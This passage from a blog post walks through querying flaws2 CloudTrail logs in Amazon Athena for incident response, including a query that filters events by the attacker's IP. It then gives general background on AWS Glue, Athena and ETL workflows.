`eventid` string COMMENT 'from deserializer',
`resources` array<struct<arn:string,accountid:string,type:string>> COMMENT 'from deserializer',
`eventtype` string COMMENT 'from deserializer',
`apiversion` string COMMENT 'from deserializer',
`readonly` string COMMENT 'from deserializer',
`recipientaccountid` string COMMENT 'from deserializer',
`serviceeventdetails` string COMMENT 'from deserializer',
`sharedeventid` string COMMENT 'from deserializer',
`vpcendpointid` string COMMENT 'from deserializer')
ROW FORMAT SERDE
'com.amazon.emr.hive.serde.CloudTrailSerde'
STORED AS INPUTFORMAT
'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
OUTPUTFORMAT
'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION
's3://flaws2-logs/AWSLogs/653711331788/CloudTrail';

You can now run:

select eventtime, eventname from cloudtrail;

You can run all your normal SQL queries against this data now, for example:

SELECT 
eventname,
count(*) AS mycount
FROM cloudtrail
GROUP BY eventname
ORDER BY mycount;
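As an illustration of how this helps in incident response, you can also filter on the attacker IP identified earlier (the column names come from the table definition above):

SELECT eventtime, eventname, sourceipaddress
FROM cloudtrail
WHERE sourceipaddress = '104.102.221.250'
ORDER BY eventtime;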

Athena is great for incident response because you don’t have to wait for the data to load anywhere: just define the table in Athena and start querying. If you use it regularly, you should also create partitions, which reduce your costs by letting you query only against a specific day. AWS Glue and Amazon Athena are both AWS services that can be used for data analysis.

AWS Glue is a service that can discover, catalog, and transform data from different sources. It can also perform data integration and ETL workflows. AWS Glue crawlers are automated tools that can scan a data source to classify, group, and catalog the data.

Amazon Athena is an interactive, serverless service that can query and analyze raw data using standard SQL. It is optimized for quick, interactive query performance on large-scale datasets. AWS Glue integrates with Athena to enable more sophisticated data catalog features: for example, AWS Glue crawlers can automatically infer database and table schemas from data in Amazon S3 and store the associated metadata in the AWS Glue Data Catalog, which Athena then uses to store and retrieve table metadata for the S3 data. ETL workflows are a series of steps and tasks that define how data is extracted, transformed, and loaded.

The ETL process involves three steps:

  1. Extract: Collect relevant data from the source database
  2. Transform: Prepare the data for analytics
  3. Load: Transfer the data to the target database

The ETL process can also include cleaning and analyzing the data.

The complexity, volume, and frequency of the data determines the type of ETL workflow used. For example, updating a data warehouse every night may require hundreds of ETL processes.

Thanks For Reading :)

Don’t miss out on my upcoming articles! Follow me on Medium for more insightful content. Clap and share this article to spread the knowledge among fellow bug bounty hunters and cybersecurity enthusiasts.

If you have any further questions or would like to connect, feel free to reach out to me.

My LinkedIn handle: https://www.linkedin.com/in/kishoreram-k/
